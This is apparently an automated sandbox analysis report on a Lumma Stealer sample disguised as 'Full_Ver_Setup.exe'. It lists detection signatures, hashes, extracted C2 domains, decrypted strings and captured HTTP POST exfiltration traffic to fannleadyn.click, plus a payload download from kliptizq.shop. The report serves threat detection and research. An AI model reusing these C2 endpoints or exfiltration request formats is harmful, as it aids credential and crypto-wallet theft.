Windows Analysis Report
Full_Ver_Setup.exe

Overview

General Information

Sample name: Full_Ver_Setup.exe
Analysis ID: 1579540
MD5: 5258ca149eea36d761a7e5649cb93855
SHA1: 6b6c7a347389758d8edfb8582a730871c6786c06
SHA256: d92ea1ef0c0f2c1b6fe016fc25473bb6ce625d9a2c5134c62806aeb07c5033af
Tags: exeuser-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

barindex
Source: Full_Ver_Setup.exe.6476.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "fannleadyn.click", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "hRjzG3--ZINA"}
Source: Full_Ver_Setup.exe Virustotal: Detection: 12% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 95.4% probability
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: fannleadyn.click
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp String decryptor: hRjzG3--ZINA
Source: Full_Ver_Setup.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [ebp+00h], al 0_2_0321E346
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-466F3075h] 0_2_03227227
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov esi, eax 0_2_0322C19F
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0322C19F
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov edx, ecx 0_2_0323D2F7
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov esi, edx 0_2_032262FD
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx esi, byte ptr [eax] 0_2_0322B2C6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [edx], al 0_2_03227125
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then jmp dword ptr [004436A4h] 0_2_03217136
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-4B2E9D9Fh] 0_2_0322A13C
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h 0_2_0323B116
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h 0_2_0323B116
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov edx, ecx 0_2_0323B116
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ecx, eax 0_2_0323F146
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov esi, eax 0_2_0322C1A4
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [edi], al 0_2_0322C1A4
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ecx, eax 0_2_0320C046
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh 0_2_0321A056
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ebx, eax 0_2_032070F6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ebp, eax 0_2_032070F6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edx, byte ptr [eax] 0_2_0322872B
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ebp, byte ptr [esp+esi-14h] 0_2_032377B6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [esi], al 0_2_0322B629
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then add ecx, FFFFFFFEh 0_2_03238636
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000ABh] 0_2_03216660
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-7B590292h] 0_2_032216A5
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then jmp ecx 0_2_032286DA
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 0_2_0322A566
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then call dword ptr [00440DA8h] 0_2_0320E43C
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [ebx+esi*8], 12BAC918h 0_2_032194C9
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ebp, byte ptr [esp+edi+0Ch] 0_2_03209B26
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov word ptr [eax], cx 0_2_03216B32
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [edi], cl 0_2_0322DB64
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h 0_2_0323EB76
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ebx, bx 0_2_03225BB6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 0_2_03234A26
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ecx, byte ptr [esp+edi+5602E8D9h] 0_2_0320DA04
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 0_2_03223A66
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-0EAF77CFh] 0_2_0322CADF
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov edx, ecx 0_2_0323E936
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h 0_2_0323E936
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edx, byte ptr [esi+ecx+60h] 0_2_0320C93C
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h] 0_2_032299A9
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ecx, eax 0_2_0323A9B6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx esi, byte ptr [esp+edx-29h] 0_2_0320A9D6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 5D0AA591h 0_2_0323CF30
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Eh] 0_2_03228F6C
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp al, 2Eh 0_2_03226F85
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [ecx], al 0_2_0320DFF2
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov byte ptr [ecx], al 0_2_0320DFF2
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx-4B2E9DB5h] 0_2_03228EA6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh 0_2_03215EC6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ecx, edx 0_2_0323EED6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 0_2_03218ED8
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ecx, eax 0_2_03226D06
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h 0_2_0323EDC6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ecx, eax 0_2_0320ADC6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx eax, byte ptr [esp+ebp+458F1EF1h] 0_2_0320ADC6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h] 0_2_03208C56
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 0_2_03208C56
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then mov ebx, edx 0_2_03237CA6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh 0_2_0323ECA6
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 4x nop then movzx esi, byte ptr [esp+edx+042DD56Dh] 0_2_0323CCE9

Networking

barindex
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.63.229:443
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: fannleadyn.click
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Joe Sandbox View IP Address: 194.58.112.174 194.58.112.174
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 194.58.112.174:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.84.113:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.63.229:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.63.229:443
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JOXNEUD6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18102Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YS0G6TE8AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8729Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XKLNRRWZBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZA887B5551User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7087Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OFJH7NIYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JZQ0PHSKJH649G7IQS3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 589758Host: fannleadyn.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: fannleadyn.click
Source: global traffic HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
Source: global traffic DNS traffic detected: DNS query: fannleadyn.click
Source: global traffic DNS traffic detected: DNS query: neqi.shop
Source: global traffic DNS traffic detected: DNS query: kliptizq.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fannleadyn.click
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 22:30:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciOJcKc1CufkB1dLLXzpE4QuZtrOWCP2oBhHllYLCvwB8TZJAeZJsDpWXlGpejCJCj0PokzJOCiz14qRai0K%2B%2BSD1jmspZVSAQ466Ysmj5YYU8i3f5RQ8LB8ubN%2BVUCb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f638f1188e30f7d-EWR
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Full_Ver_Setup.exe String found in binary or memory: http://www.innosetup.com/
Source: Full_Ver_Setup.exe String found in binary or memory: http://www.remobjects.com/ps
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Full_Ver_Setup.exe, 00000000.00000003.1922564633.000000000400D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.2180106835.0000000005431000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Full_Ver_Setup.exe, 00000000.00000003.1874405140.0000000003F4A000.00000004.00000800.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1874719963.0000000003F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Full_Ver_Setup.exe, 00000000.00000003.1971013794.0000000000824000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/
Source: Full_Ver_Setup.exe, 00000000.00000003.1992514646.000000000082A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/1X
Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/Y
Source: Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1922088795.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1946447013.0000000000861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/api
Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/api2
Source: Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/apiDZ
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/apiF9
Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1992272379.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fannleadyn.click/apiv
